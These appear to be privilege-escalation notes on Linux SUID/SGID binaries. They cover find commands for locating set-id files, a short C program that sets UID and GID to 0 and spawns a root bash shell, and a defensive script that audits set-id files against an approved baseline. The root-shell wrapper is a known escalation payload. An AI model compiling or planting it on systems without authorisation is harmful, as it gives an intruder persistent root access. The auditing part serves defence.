SUID/SGID Binaries
SUID Binaries
SUID binaries have a special filesystem permission that makes them execute with the effective user ID (UID) of the file owner rather than that of the user who runs them. An obvious example is sudo, which allows you to run commands as the root user (uid=0):
-rwsr-xr-x 1 root root 306456 Jun 30 01:55 /usr/bin/sudo

Finding SUID/SGID binaries is simple enough with a find search:
find / -perm -u=s -type f 2>/dev/null # SUID only
find / -perm /u=s,g=s -type f 2>/dev/null # SUID or SGID (either bit set)

While most binaries are exploitable by themselves, there are times when you may need to make your own. Remember to call the setuid(0) function prior to executing your payload:
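#include <unistd.h>

int main(void) {
    /* With an effective UID of 0, setuid(0) sets the real, effective and saved UIDs to 0. */
    setuid(0);
    setgid(0);
    /* The argument list of execl() must end with a null pointer of type char *. */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0; /* reached only if execl() fails */
}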
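
The find search above also works as a defensive check: the script below (an added example, not part of the original page) compares the SUID/SGID files currently under a directory with an approved baseline list and reports anything new or missing. The function names, the one-path-per-line baseline format and the sample tree of empty files are assumptions made for this example.

```shell
#!/bin/sh
# Added example: baseline audit of SUID/SGID files (names are hypothetical).

# list_setid ROOT: every SUID (-4000) or SGID (-2000) regular file under ROOT.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
        LC_ALL=C sort
}

# audit_setid ROOT BASELINE: BASELINE holds one approved path per line.
# Prints "NEW <path>" for set-id files that are not in the baseline and
# "GONE <path>" for baseline entries that no longer carry a set-id bit.
# Returns 0 if the tree matches the baseline, 1 if it differs.
audit_setid() {
    cur=$(mktemp) && base=$(mktemp) || return 2
    list_setid "$1" > "$cur"
    LC_ALL=C sort -u "$2" > "$base"
    report=$(LC_ALL=C comm -23 "$cur" "$base" | sed 's/^/NEW /'
             LC_ALL=C comm -13 "$cur" "$base" | sed 's/^/GONE /')
    rm -f "$cur" "$base"
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# make_sample_tree: constructed test data (empty files, no real binaries).
# Prints the directory it created.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    touch "$d/approved" "$d/unexpected" "$d/plain" "$d/was_setid"
    chmod 4755 "$d/approved"      # SUID, listed in the baseline
    chmod 6755 "$d/unexpected"    # SUID+SGID, not in the baseline
    chmod 0755 "$d/plain" "$d/was_setid"
    printf '%s\n' "$d/approved" "$d/was_setid" > "$d/baseline.txt"
    printf '%s\n' "$d"
}

# Demo run on the constructed tree.
tree=$(make_sample_tree)
audit_setid "$tree" "$tree/baseline.txt" || true
rm -rf "$tree"
```

On a real host, generate the baseline once from a known-good state with list_setid and review every NEW line, since a set-id bit that appears outside a package update deserves an explanation.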